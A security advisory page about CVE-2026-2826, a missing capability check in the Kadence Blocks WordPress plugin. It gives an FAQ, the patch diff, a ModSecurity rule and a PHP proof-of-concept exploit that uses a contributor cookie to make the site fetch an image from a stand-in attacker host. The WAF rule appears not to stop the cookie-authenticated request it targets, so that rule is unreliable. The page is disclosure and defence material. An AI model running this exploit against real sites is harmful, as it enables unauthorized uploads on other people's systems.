What is CVE-2026-2826?

CVE-2026-2826 is a medium-severity vulnerability in the Kadence Blocks plugin for WordPress, affecting versions up to and including 3.6.3. It allows authenticated users with contributor-level access or higher to bypass authorization checks and upload images to the WordPress Media Library.

How does this vulnerability work?

The vulnerability exists due to a missing capability check in the process_pattern REST API endpoint. Authenticated users can send a crafted request with remote image URLs, which the server downloads and adds to the media library, even if they lack the necessary upload_files capability.

Who is affected by this vulnerability?

All WordPress sites using the Kadence Blocks plugin version 3.6.3 or earlier are affected. Specifically, authenticated users with contributor-level permissions or higher can exploit this vulnerability to upload arbitrary images.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Kadence Blocks plugin installed. If it is version 3.6.3 or lower, your site is at risk. Additionally, review user permissions to identify who has contributor-level access or higher.

How can I fix this vulnerability?

The vulnerability is patched in version 3.6.4 of the Kadence Blocks plugin. Update the plugin to this version or later to mitigate the risk. Regularly check for updates to ensure ongoing security.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider temporarily restricting access to the WordPress admin area for users with contributor-level permissions. This can help prevent exploitation until the plugin is updated.

What does a CVSS score of 4.3 indicate?

A CVSS score of 4.3 is classified as medium severity, indicating that the vulnerability poses a moderate risk. While it may not be critical, it can still lead to unauthorized actions that could compromise site integrity.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability allows attackers to upload arbitrary images, which can lead to resource exhaustion, inappropriate content in the media library, and potential privilege escalation for users. This can affect site performance and reputation.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can use a valid authentication cookie from a contributor account to send a crafted request to the vulnerable endpoint. It shows how the server processes the request and uploads an image without proper authorization checks.

What steps should I take after updating the plugin?

After updating the Kadence Blocks plugin, review user permissions to ensure that only necessary users have contributor-level access or higher. Additionally, monitor your site for any unauthorized uploads or unusual activity.

Where can I find more information about this vulnerability?

More information about CVE-2026-2826 can be found on the official CVE database and security advisories related to the Kadence Blocks plugin. Additionally, consider following security blogs and forums for updates on vulnerabilities and best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-2826: Kadence Blocks — Page Builder Toolkit for Gutenberg Editor <= 3.6.3 – Missing Authorization to Authenticated (Contributor+) Media Upload (kadence-blocks)

CVE ID CVE-2026-2826

Plugin kadence-blocks

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 3.6.3

Patched Version 3.6.4

Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2826:
This vulnerability is an authorization bypass in the Kadence Blocks WordPress plugin. It allows authenticated users with contributor-level permissions or higher to upload arbitrary images to the WordPress Media Library without possessing the required `upload_files` capability. The vulnerability affects versions up to and including 3.6.3, with a CVSS score of 4.3.

The root cause is a missing capability check in the `process_pattern` REST API endpoint. The vulnerable code resides in `/kadence-blocks/includes/class-kadence-blocks-prebuilt-library-rest-api.php` at line 1212. The `process_pattern` function accepted requests and processed image downloads without verifying the user’s `upload_files` capability. Two other functions, `process_images` in the same file (line 830) and in `/kadence-blocks/includes/class-kadence-blocks-image-picker-rest.php` (line 68), also lacked this check.

An attacker exploits this by sending a crafted POST request to the vulnerable REST API endpoint `/wp-json/kadence-blocks/v1/process_pattern`. The request must contain a valid WordPress authentication cookie for a contributor-level account and a JSON payload with a `content` parameter. This parameter includes remote image URLs. The server downloads these images and creates new media attachments, effectively granting unauthorized upload capabilities.

The patch adds a capability check using `current_user_can(‘upload_files’)` at the beginning of all three vulnerable functions. In `class-kadence-blocks-prebuilt-library-rest-api.php`, lines 1221-1228 were added to the `process_pattern` function, and lines 836-843 were added to the `process_images` function. In `class-kadence-blocks-image-picker-rest.php`, lines 74-81 were added. If the check fails, the functions now return a `WP_Error` object with a 403 status, preventing unauthorized image processing. The plugin version was incremented to 3.6.4.

Successful exploitation allows attackers to populate the WordPress Media Library with arbitrary images from external URLs. This can lead to resource exhaustion, storage quota consumption, and the introduction of malicious or inappropriate content. While contributor-level users can already create posts, this bypass grants them a specific capability (`upload_files`) reserved for authors, editors, and administrators, constituting a privilege escalation within the media management system.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/kadence-blocks/includes/class-kadence-blocks-image-picker-rest.php
+++ b/kadence-blocks/includes/class-kadence-blocks-image-picker-rest.php
@@ -68,12 +68,21 @@
 	 *
 	 * @param WP_REST_Request $request Full details about the request.
 	 *
-	 * @return array<array{id: int, url: string}> A list of local or pexels images, where the ID is an attachment_id or pexels_id.
+	 * @return array<array{id: int, url: string}>|WP_Error A list of local or pexels images, or WP_Error on permission failure.
 	 * @throws InvalidArgumentException
 	 * @throws Throwable
 	 * @throws ImageDownloadException
 	 */
 	public function process_images( $request ) {
+		// Require upload capability; this endpoint downloads images and adds them to the media library.
+		if ( ! current_user_can( 'upload_files' ) ) {
+			return new WP_Error(
+				'rest_forbidden',
+				__( 'You do not have permission to upload files.', 'kadence-blocks' ),
+				array( 'status' => 403 )
+			);
+		}
+
 		$parameters = (array) $request->get_json_params();

 		return kadence_blocks()->get( Image_Downloader::class )->download( $parameters );
--- a/kadence-blocks/includes/class-kadence-blocks-prebuilt-library-rest-api.php
+++ b/kadence-blocks/includes/class-kadence-blocks-prebuilt-library-rest-api.php
@@ -830,12 +830,21 @@
 	 *
 	 * @param WP_REST_Request $request Full details about the request.
 	 *
-	 * @return array<array{id: int, url: string}> A list of local or pexels images, where the ID is an attachment_id or pexels_id.
+	 * @return array<array{id: int, url: string}>|WP_Error A list of local or pexels images, or WP_Error on permission failure.
 	 * @throws InvalidArgumentException
 	 * @throws Throwable
 	 * @throws ImageDownloadException
 	 */
-	public function process_images( WP_REST_Request $request ): array {
+	public function process_images( WP_REST_Request $request ) {
+		// Require upload capability; this endpoint downloads images and adds them to the media library.
+		if ( ! current_user_can( 'upload_files' ) ) {
+			return new WP_Error(
+				'rest_forbidden',
+				__( 'You do not have permission to upload files.', 'kadence-blocks' ),
+				array( 'status' => 403 )
+			);
+		}
+
 		$parameters = (array) $request->get_json_params();

 		return kadence_blocks()->get( Image_Downloader::class )->download( $parameters );
@@ -1212,6 +1221,15 @@
 	 * @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
 	 */
 	public function process_pattern( WP_REST_Request $request ) {
+		// Require upload capability; pattern processing downloads images and adds them to the media library.
+		if ( ! current_user_can( 'upload_files' ) ) {
+			return new WP_Error(
+				'rest_forbidden',
+				__( 'You do not have permission to upload files.', 'kadence-blocks' ),
+				array( 'status' => 403 )
+			);
+		}
+
 		$parameters = $request->get_json_params();
 		if ( empty( $parameters['content'] ) ) {
 			return rest_ensure_response( 'failed' );
--- a/kadence-blocks/kadence-blocks.php
+++ b/kadence-blocks/kadence-blocks.php
@@ -5,7 +5,7 @@
  * Description: Advanced Page Building Blocks for Gutenberg. Create custom column layouts, backgrounds, dual buttons, icons etc.
  * Author: Kadence WP
  * Author URI: https://www.kadencewp.com
- * Version: 3.6.3
+ * Version: 3.6.4
  * Requires PHP: 7.4
  * Text Domain: kadence-blocks
  * License: GPL2+
@@ -20,7 +20,7 @@
 }
 define( 'KADENCE_BLOCKS_PATH', realpath( plugin_dir_path( __FILE__ ) ) . DIRECTORY_SEPARATOR );
 define( 'KADENCE_BLOCKS_URL', plugin_dir_url( __FILE__ ) );
-define( 'KADENCE_BLOCKS_VERSION', '3.6.3' );
+define( 'KADENCE_BLOCKS_VERSION', '3.6.4' );

 require_once plugin_dir_path( __FILE__ ) . 'vendor/vendor-prefixed/autoload.php';
 require_once plugin_dir_path( __FILE__ ) . 'vendor/autoload.php';
--- a/kadence-blocks/vendor/composer/installed.php
+++ b/kadence-blocks/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'kadencewp/kadence-blocks',
-        'pretty_version' => '3.6.3',
-        'version' => '3.6.3.0',
-        'reference' => '5576fcdeef782ab5a070a117d636a2cbe6e0ae50',
+        'pretty_version' => '3.6.4',
+        'version' => '3.6.4.0',
+        'reference' => '82860e483d942e4bee0043d2eb00422f8f12cbca',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -47,9 +47,9 @@
             'dev_requirement' => false,
         ),
         'kadencewp/kadence-blocks' => array(
-            'pretty_version' => '3.6.3',
-            'version' => '3.6.3.0',
-            'reference' => '5576fcdeef782ab5a070a117d636a2cbe6e0ae50',
+            'pretty_version' => '3.6.4',
+            'version' => '3.6.4.0',
+            'reference' => '82860e483d942e4bee0043d2eb00422f8f12cbca',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2826
SecRule REQUEST_URI "@rx ^/wp-json/kadence-blocks/v1/process_pattern$" 
  "id:10002826,phase:2,deny,status:403,chain,msg:'CVE-2026-2826 - Unauthorized image upload via Kadence Blocks REST API',severity:'CRITICAL',tag:'CVE-2026-2826',tag:'wordpress',tag:'kadence-blocks'"
  SecRule REQUEST_HEADERS:Authorization "!@rx ^Bearer" 
    "chain"
    SecRule &REQUEST_COOKIES:/wordpress_logged_in_/ "@eq 0" 
      "t:none,setvar:'tx.cve_2026_2826_score=+%{tx.critical_anomaly_score}',setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2826 - Kadence Blocks — Page Builder Toolkit for Gutenberg Editor <= 3.6.3 - Missing Authorization to Authenticated (Contributor+) Media Upload
<?php

$target_url = 'https://vulnerable-site.com';
$cookie = 'wordpress_logged_in_abc=...'; // Valid auth cookie for a Contributor user
$remote_image_url = 'https://attacker-server.com/image.jpg';

// Construct the vulnerable REST API endpoint
$endpoint = $target_url . '/wp-json/kadence-blocks/v1/process_pattern';

// Craft the JSON payload containing a remote image URL for the server to download
$payload = json_encode([
    'content' => '<p>Test pattern with image: <img src="' . $remote_image_url . '" /></p>'
]);

// Initialize cURL
$ch = curl_init($endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Cookie: ' . $cookie
]);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check response
if ($http_code === 200 && $response !== 'failed') {
    echo "[+] Image upload likely successful. Response: $responsen";
} else {
    echo "[-] Request failed. HTTP Code: $http_code, Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-2826?
Overview of the vulnerability
CVE-2026-2826 is a medium-severity vulnerability in the Kadence Blocks plugin for WordPress, affecting versions up to and including 3.6.3. It allows authenticated users with contributor-level access or higher to bypass authorization checks and upload images to the WordPress Media Library.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists due to a missing capability check in the process_pattern REST API endpoint. Authenticated users can send a crafted request with remote image URLs, which the server downloads and adds to the media library, even if they lack the necessary upload_files capability.
Who is affected by this vulnerability?
Identifying impacted users
All WordPress sites using the Kadence Blocks plugin version 3.6.3 or earlier are affected. Specifically, authenticated users with contributor-level permissions or higher can exploit this vulnerability to upload arbitrary images.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the Kadence Blocks plugin installed. If it is version 3.6.3 or lower, your site is at risk. Additionally, review user permissions to identify who has contributor-level access or higher.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 3.6.4 of the Kadence Blocks plugin. Update the plugin to this version or later to mitigate the risk. Regularly check for updates to ensure ongoing security.
What if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider temporarily restricting access to the WordPress admin area for users with contributor-level permissions. This can help prevent exploitation until the plugin is updated.
What does a CVSS score of 4.3 indicate?
Understanding the severity rating
A CVSS score of 4.3 is classified as medium severity, indicating that the vulnerability poses a moderate risk. While it may not be critical, it can still lead to unauthorized actions that could compromise site integrity.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability allows attackers to upload arbitrary images, which can lead to resource exhaustion, inappropriate content in the media library, and potential privilege escalation for users. This can affect site performance and reputation.
How does the proof of concept demonstrate the issue?
Explaining the provided code
The proof of concept illustrates how an attacker can use a valid authentication cookie from a contributor account to send a crafted request to the vulnerable endpoint. It shows how the server processes the request and uploads an image without proper authorization checks.
What steps should I take after updating the plugin?
Post-update security measures
After updating the Kadence Blocks plugin, review user permissions to ensure that only necessary users have contributor-level access or higher. Additionally, monitor your site for any unauthorized uploads or unusual activity.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-2826 can be found on the official CVE database and security advisories related to the Kadence Blocks plugin. Additionally, consider following security blogs and forums for updates on vulnerabilities and best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations